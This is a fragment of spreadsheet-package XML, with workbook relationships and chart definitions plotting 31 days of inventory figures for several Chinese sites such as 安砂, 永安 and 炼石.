        <patternFill patternType="solid"/>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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink16.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet6.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink14.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink13.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink12.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink11.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink10.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink9.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink8.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink7.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink6.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet5.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink4.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink3.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink2.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink1.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0513874872472292"/>
          <c:y val="0.00794912559618444"/>
          <c:w val="0.00719424821461101"/>
          <c:h val="0.0111287758346594"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="243993984"/>
        <c:axId val="108889216"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="243993984"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:majorTickMark val="in"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr lang="zh-CN" sz="12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108889216"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="108889216"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorTickMark val="in"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr lang="zh-CN" sz="12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43993984"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln w="25400">
          <a:noFill/>
        </a:ln>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="0"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{70049ded-be94-4b3a-91ba-c4603e357df0}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
      <a:solidFill>
        <a:srgbClr val="808080"/>
      </a:solidFill>
      <a:prstDash val="solid"/>
      <a:round/>
    </a:ln>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN" sz="12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301210466406"/>
          <c:y val="0.0381558028616852"/>
          <c:w val="0.736896567125157"/>
          <c:h val="0.855325914149511"/>
        </c:manualLayout>
      </c:layout>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$4</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>安砂</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="diamond"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="666699"/>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库存!$E$4:$AI$4</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>19.0518102</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>19.1329202</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>19.1849322</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>19.2232412</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>18.7949422</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>18.7328752</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>18.6815862</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>18.6922342</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>18.7579012</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>18.5871312</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>17.9938012</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>17.2455102</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>16.6384392</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>16.0726282</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>15.2918702</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>14.5337782</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>13.9685782</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>13.4896782</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>12.8734782</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>12.1768992</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>11.3040482</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>10.5441482</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>9.7486802</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>8.9170472</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>8.2481692</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>7.6921462</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>7.0774962</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>6.4308542</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>5.7214362</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>5.0502292</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>4.5537442</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$5</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>永安</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="square"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="993366"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="993366"/>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库存!$E$5:$AI$5</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>5.9528616</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5.7313616</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>5.4316616</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>5.2562616</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5.4650616</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5.7330616</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6.1342616</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6.3424616</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>6.4985616</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>6.6756616</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>6.7835616</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>6.9460016</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>7.0335876</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>7.0502466</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>7.1632136</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>7.3214876</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>7.4102316</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>7.2130266</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>7.2702376</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>7.4639736</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>7.1867796</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>7.0068796</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6.7276796</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6.3689796</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>5.9013266</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>5.4251626</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>4.8692156</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>4.5580156</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>4.1545226</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>3.8802806</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.6724806</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$6</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v/>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="triangle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="80808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库存!$E$6:$AI$6</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>金银湖</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="x"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="666699"/>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库存!$E$7:$AI$7</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4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$8</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>炼石</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="star"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="33CCCC"/>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库存!$E$8:$AI$8</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>10.016122500005</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>9.66399720000502</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>9.10130220000503</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>8.27855630000503</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7.59323360000503</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>7.11235750000503</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6.50065150000503</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6.01119150000504</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5.49019020000504</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5.36160220000504</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5.03208220000504</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4.47114650000504</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>4.15534650000505</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>3.80364050000505</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>3.58171200000505</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>3.51337400000505</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3.33174290000505</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3.16763550000505</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>3.09698080000506</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>3.21151380000506</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>3.33444780000506</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>3.39850080000506</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>3.34496930000507</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>3.32169130000507</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>3.63478030000507</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>3.57904500000507</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>3.80551900000507</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>3.95287600000507</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3.86590700000508</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>3.50398350000508</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.61417950000508</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$9</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>福州炼石</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF8080"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FF808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库存!$E$9:$AI$9</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>1.6502634</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1.6869634</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1.7054634</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1.5596634</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1.8070634</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1.6897634</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1.5474634</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1.5147634</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1.5813634</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1.7703634</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1.7874634</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1.6100634</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1.6416634</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1.8530634</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1.7843634</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1.9552634</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2.1453634</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2.1704634</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2.2203634</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2.1208634</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2.0843634</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2.1670634</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2.1035634</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>1.6927634</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>1.7029634</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>1.8092634</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>1.73976339999999</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>1.59126339999999</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>1.38816339999999</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1.60376339999999</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1.6152634</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$10</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v/>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="plus"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="333399"/>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库存!$E$10:$AI$10</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>0.508962</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.507982</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.497936</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.49665</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.514038</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.493434</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.47608</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0.478686</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.482548</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.494572</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.510648</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.521016</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>0.515812</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>0.51684</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>0.519906</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>0.490596</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0.508504</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>0.492834</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>0.488188</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>0.498242</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>0.535186</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>0.558964</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>0.560288</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>0.54914</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>0.584156</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>0.604216</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>0.624488</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>0.623504</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>0.626288</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>0.623606</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>0.589106</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="7"/>
          <c:order val="7"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$11</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>宁德</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="dot"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="993300"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="99330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库存!$E$11:$AI$11</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>0.046766</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>0.046766</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="211180544"/>
        <c:axId val="211202816"/>
      </c:lineChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="8"/>
          <c:order val="8"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$12</c:f>
              <c:strCache>
